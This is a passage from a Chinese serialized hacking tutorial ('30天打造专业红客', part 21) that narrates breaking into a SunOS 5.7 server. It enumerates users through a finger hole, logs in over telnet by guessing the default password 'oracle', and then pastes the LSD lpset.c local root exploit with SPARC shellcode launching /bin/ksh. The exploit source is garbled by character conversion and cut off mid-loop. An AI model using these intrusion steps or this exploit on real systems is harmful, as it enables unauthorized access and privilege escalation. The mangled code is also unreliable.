30天打造专业红客-第21部分

按键盘上方向键 ← 或 → 可快速上下翻页，按键盘上的 Enter 键可回到本书目录页，按键盘上方向键 ↑ 可回到本页顶部！
————未阅读完？加入书签已便下次继续阅读！


liuy？？？pts/5　　　211。101。132。50
oracle　？？？console　　6：57　Mon　14：29　　：0
oracle　？？？pts/24d　Mon　14：29　　：0。0
oracle　？？？pts/522　Sat　16：34　　61。140。253。142
D：》
存在finger漏洞。系统的用户显示出来了。（chenhy、mdevice、liuy、orcle）
oracle，通常oracle的密码就是oracle。
马上试一下！
D：》tel　127。0。0。17
SunOS　5。7
login：　oracle
Password：
Last　login：　Sat　Aug　　4　17：25：49　from　61。140。253。142
Sun　Microsystems　Inc。SunOS　5。7　Generic　October　1998

成功了！
假如在这一步并没有猜到用户的密码，我们可以利用其他工具继续猜测。
　
命令：uname　…a
查看主机的信息。　
uname　…a
SunOS　mars　5。7　Generic_106541…08　sun4u　sparc　SUNW；Ultra…5_10
SunOS　mars　5。7：SunOS的版本。
sparc：服务器版本。
Generic_106541…08：补丁情况。
　
找到exploit：lpset。c
cat　》lpst。c
/*##　copyright　LAST　STAGE　OF　DELIRIUM　apr　2000　poland　　*：//lsd…pl。/　#*/
/*##　/usr/bin/lpset　#*/
#define　NOPNUM　864
#define　ADRNUM　132
#define　ALLIGN　3
char　shellcode＇＇=
　〃x20xbfxffxff〃　　/*　bn；a　　　*/
　〃x20xbfxffxff〃　　/*　bn；a　　*/
　〃x7fxffxffxff〃　　/*　call　　　*/
　〃x90x03xe0x20〃　　/*　add　　％o7；32；％o0　　*/
　〃x92x02x20x10〃　　/*　add　　％o0；16；％o1　　*/
　〃xc0x22x20x08〃　　/*　st％g0；＇％o0＋8＇　*/
　〃xd0x22x20x10〃　　/*　st％o0；＇％o0＋16＇*/
　〃xc0x22x20x14〃　　/*　st％g0；＇％o0＋20＇*/
　〃x82x10x20x0b〃　　/*　mov　　0xb；％g1　　*/
　〃x91xd0x20x08〃　　/*　ta8　　*/
　〃/bin/ksh〃
；
char　jump＇＇=
　〃x81xc3xe0x08〃　　/*　jmp　　％o7＋8　*/
　〃x90x10x00x0e〃　　/*　mov　　％sp；％o0　　*/
；
static　char　nop＇＇=〃x80x1cx40x11〃；
main（int　argc；char　**argv）｛
　char　buffer＇10000＇；adr＇4＇；*b；
　int　i；
　printf（〃copyright　LAST　STAGE　OF　DELIRIUM　apr　2000　poland　　//lsd…pl。/n〃）；
　printf（〃/usr/bin/lpset　for　solaris　2。6　2。7　sparcnn〃）；
　*（（unsigned　long*）adr）=（*（unsigned　long（*）（））jump）（）＋10088＋400；
　b=buffer；
　sprintf（b；〃***=〃）；
　b＋=4；
　for（i=0；i